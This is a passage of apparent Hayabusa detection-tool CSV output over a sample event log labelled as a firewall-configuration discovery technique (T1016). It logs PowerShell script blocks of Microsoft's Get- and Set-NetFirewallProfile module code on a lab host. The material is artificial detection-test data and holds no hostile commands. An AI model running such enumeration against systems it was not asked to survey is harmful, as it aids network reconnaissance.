($PSBoundParameters.ContainsKey('DefaultInboundAction')) { [object]$__cmdletization_value = ${DefaultInboundAction} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefaultInboundAction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefaultInboundAction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefaultOutboundAction')) { [object]$__cmdletization_value = ${DefaultOutboundAction} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefaultOutboundAction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefaultOutboundAction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowInboundRules')) { [object]$__cmdletization_value = ${AllowInboundRules} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowInboundRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowInboundRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowLocalFirewallRules')) { [object]$__cmdletization_value = ${AllowLocalFirewallRules} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowLocalFirewallRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowLocalFirewallRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowLocalIPsecRules')) { [object]$__cmdlet",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.051 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,ization_value = ${AllowLocalIPsecRules} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowLocalIPsecRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowLocalIPsecRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowUserApps')) { [object]$__cmdletization_value = ${AllowUserApps} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowUserApps'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowUserApps'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowUserPorts')) { [object]$__cmdletization_value = ${AllowUserPorts} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowUserPorts'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowUserPorts'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowUnicastResponseToMulticast')) { [object]$__cmdletization_value = ${AllowUnicastResponseToMulticast} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowUnicastResponseToMulticast'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowUnicastResponseToMulticast'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NotifyOnListen')) { [object]$__cmdletization_value = ${NotifyOnListen} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NotifyOnListen'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NotifyOnListen'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnableStealthModeForIPsec')) { [object]$__cmdletization_value = ${EnableStealthModeForIPsec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnableStealthModeForIPsec'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnableStealthModeForIPsec'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LogFileName')) { [object]$__cmdletization_value = ${LogFileName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LogFileName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LogFileName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LogMaxSizeKilobytes')) { [object]$__cmdletization_value = ${LogMaxSizeKilobytes} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LogMaxSizeKilobytes'; ParameterType = 'System.UInt64'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LogMaxSizeKilobytes'; ParameterType = 'System.UInt64'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LogAllowed')) { [object]$__cmdletization_value = ${LogAllowed} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LogAllowed'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LogAllowed'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LogBlocked')) { [object]$__cmdletization_value = ${LogBlocked} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LogBlocked'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LogBlocked'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LogIgnored')) { [object]$__cmdletization_value = ${LogIgnored} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LogIgnored'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LogIgnored'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_method,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.051 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"Parameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisabledInterfaceAliases')) { [object]$__cmdletization_value = ${DisabledInterfaceAliases} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DisabledInterfaceAliases'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DisabledInterfaceAliases'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallProfile.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallProfile'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.051 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.051 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Get-NetFirewallProfile { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('Profile')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('Name', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleInProfile', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleInProfile', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleInProfile', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallProfile.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.067 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallProfile""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.067 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallProfile""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.067 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; value=""Set-StrictMode""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.067 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.067 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Collections.Generic.Dictionary[string,string]""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.067 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.067 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Set-NetFirewallProfile { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('Profile')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${Enabled}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action] ${DefaultInboundAction}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action] ${DefaultOutboundAction}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowInboundRules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] 